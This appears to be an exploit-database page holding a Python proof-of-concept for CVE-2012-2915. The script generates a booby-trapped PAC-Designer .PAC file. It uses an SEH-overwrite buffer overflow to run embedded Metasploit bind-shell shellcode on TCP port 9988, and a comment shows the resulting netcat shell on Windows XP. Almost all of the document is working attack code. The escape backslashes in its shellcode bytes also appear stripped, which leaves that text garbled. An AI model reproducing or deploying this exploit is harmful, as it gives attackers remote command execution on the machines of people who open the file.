Lattice Semiconductor PAC-Designer 6.21 (*.PAC) Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Lattice Semiconductor PAC-Designer 6.21 (*.PAC) Exploit
# Published : 2012-06-07
# Author :
# Previous Title : Exploit: NCMedia Sound Editor Pro v7.5.1 SEH&DEP
# Next Title : ActFax 4.31 Local Privilege Escalation Exploit
#!/usr/bin/python -w

#------------------------------------------------------------------------------------#
# Exploit: Lattice Semiconductor PAC-Designer 6.21 (possibly all versions)           #
# CVE: CVE-2012-2915                                                                 #
# Author: b33f (Ruben Boonen) - http://www.fuzzysecurity.com/                        #
# OS: WinXP SP1                                                                      #
# Software: http://www.latticesemi.com/products/designsoftware/pacdesigner/index.cfm #
#------------------------------------------------------------------------------------#
# I didn't dig to deep but it seems portability to other OS builds is not promising  #
# due to SafeSEH and badchars in the application modules.                            #
#------------------------------------------------------------------------------------#
# root@bt:~# nc -nv 192.168.111.130 9988                                             #
#  (UNKNOWN) [192.168.111.130] 9988 (?) open                                         #
#  Microsoft Windows XP [Version 5.1.2600]                                           #
#  (C) Copyright 1985-2001 Microsoft Corp.                                           #
#                                                                                    #
#  C:Documents and SettingsOwnerDesktop>                                          #
#------------------------------------------------------------------------------------#

filename="evil.PAC"

PAC1 = """<?xml version="1.0"?>

<PacDesignData>

<DocFmtVersion>1</DocFmtVersion>
<DeviceType>ispPAC-CLK5410D</DeviceType>

<CreatedBy>PAC-Designer 6.21.1336</CreatedBy>

<SummaryInformation>
<Title>Oops..</Title>
<Author>b33f</Author>
</SummaryInformation>

<SymbolicSchematicData>
  <Symbol>
    <SymKey>153</SymKey>
    <NameText>Profile 0 Ref Frequency</NameText>
    <Value>"""

#------------------------------------------------------------------------------------#
# msfpayload windows/shell_bind_tcp LPORT=9988 R| msfencode -e x86/alpha_mixed -t c  #
# [*] x86/alpha_mixed succeeded with size 744 (iteration=1)                          #
#------------------------------------------------------------------------------------#
shellcode = (
"x89xe3xd9xd0xd9x73xf4x5ex56x59x49x49x49x49x49"
"x49x49x49x49x49x43x43x43x43x43x43x37x51x5ax6a"
"x41x58x50x30x41x30x41x6bx41x41x51x32x41x42x32"
"x42x42x30x42x42x41x42x58x50x38x41x42x75x4ax49"
"x79x6cx59x78x4ex69x35x50x35x50x57x70x53x50x6b"
"x39x6ax45x35x61x38x52x73x54x4cx4bx36x32x70x30"
"x4ex6bx56x32x36x6cx6ex6bx72x72x32x34x6ex6bx33"
"x42x66x48x56x6fx38x37x61x5ax45x76x56x51x59x6f"
"x45x61x59x50x6ex4cx67x4cx73x51x73x4cx74x42x46"
"x4cx45x70x4bx71x58x4fx54x4dx63x31x69x57x78x62"
"x7ax50x46x32x63x67x6ex6bx70x52x66x70x4ex6bx30"
"x42x47x4cx76x61x6ex30x4ex6bx57x30x73x48x4bx35"
"x69x50x72x54x53x7ax75x51x6ex30x36x30x6ex6bx72"
"x68x55x48x6ex6bx30x58x31x30x65x51x5ax73x7ax43"
"x75x6cx72x69x6cx4bx64x74x4cx4bx45x51x6ax76x74"
"x71x79x6fx76x51x4fx30x6cx6cx69x51x6ax6fx64x4d"
"x35x51x69x57x45x68x4dx30x74x35x6bx44x75x53x73"
"x4dx49x68x67x4bx61x6dx45x74x30x75x69x72x32x78"
"x4cx4bx51x48x36x44x55x51x38x53x51x76x6cx4bx66"
"x6cx42x6bx6cx4bx66x38x37x6cx66x61x38x53x4ex6b"
"x63x34x6cx4bx67x71x48x50x6dx59x72x64x56x44x74"
"x64x33x6bx31x4bx53x51x66x39x62x7ax72x71x59x6f"
"x4bx50x33x68x31x4fx62x7ax4cx4bx35x42x4ax4bx6d"
"x56x31x4dx42x48x36x53x30x32x57x70x33x30x42x48"
"x71x67x52x53x57x42x43x6fx71x44x42x48x50x4cx43"
"x47x71x36x53x37x79x6fx58x55x58x38x6ax30x56x61"
"x65x50x73x30x76x49x6ax64x43x64x30x50x52x48x47"
"x59x4dx50x30x6bx57x70x39x6fx6ex35x72x70x76x30"
"x52x70x36x30x31x50x36x30x43x70x76x30x32x48x69"
"x7ax64x4fx69x4fx79x70x49x6fx79x45x6ex69x4ax67"
"x34x71x49x4bx62x73x43x58x63x32x77x70x56x47x76"
"x64x6dx59x79x76x32x4ax56x70x32x76x61x47x63x58"
"x38x42x4bx6bx67x47x53x57x59x6fx4ex35x31x43x76"
"x37x33x58x48x37x69x79x35x68x69x6fx79x6fx6ex35"
"x30x53x31x43x63x67x35x38x51x64x38x6cx75x6bx49"
"x71x59x6fx79x45x43x67x6cx49x5ax67x42x48x52x55"
"x30x6ex70x4dx61x71x79x6fx58x55x32x48x33x53x30"
"x6dx33x54x43x30x4ex69x49x73x56x37x33x67x62x77"
"x54x71x59x66x71x7ax57x62x32x79x36x36x38x62x6b"
"x4dx61x76x58x47x51x54x74x64x57x4cx75x51x55x51"
"x6ex6dx77x34x46x44x44x50x68x46x37x70x50x44x31"
"x44x76x30x72x76x61x46x72x76x50x46x43x66x72x6e"
"x31x46x76x36x71x43x30x56x33x58x43x49x38x4cx47"
"x4fx6cx46x59x6fx6bx65x4fx79x79x70x32x6ex32x76"
"x57x36x39x6fx70x30x43x58x45x58x4bx37x35x4dx73"
"x50x79x6fx6ex35x4dx6bx6cx30x6cx75x79x32x73x66"
"x62x48x6fx56x4cx55x4dx6dx6dx4dx39x6fx6ax75x65"
"x6cx47x76x73x4cx64x4ax6dx50x79x6bx49x70x33x45"
"x54x45x4fx4bx63x77x47x63x33x42x72x4fx51x7ax37"
"x70x30x53x79x6fx68x55x41x41")

#------------------------------------------------------------------------------------#
# SEH: 0x77512879 : pop esi # pop ecx # ret - SHELL32.dll                            #
# nSEH: xEBx05                                                                     #
#------------------------------------------------------------------------------------#
b00m = "x90"*20 + shellcode
payload = "A"*98 + "xEBx05x79x28x51x77" + b00m + "C"*(5000-len(b00m))

PAC2 = """</Value>
  </Symbol>
</SymbolicSchematicData>

</PacDesignData>"""

buffer = PAC1 + payload + PAC2

textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()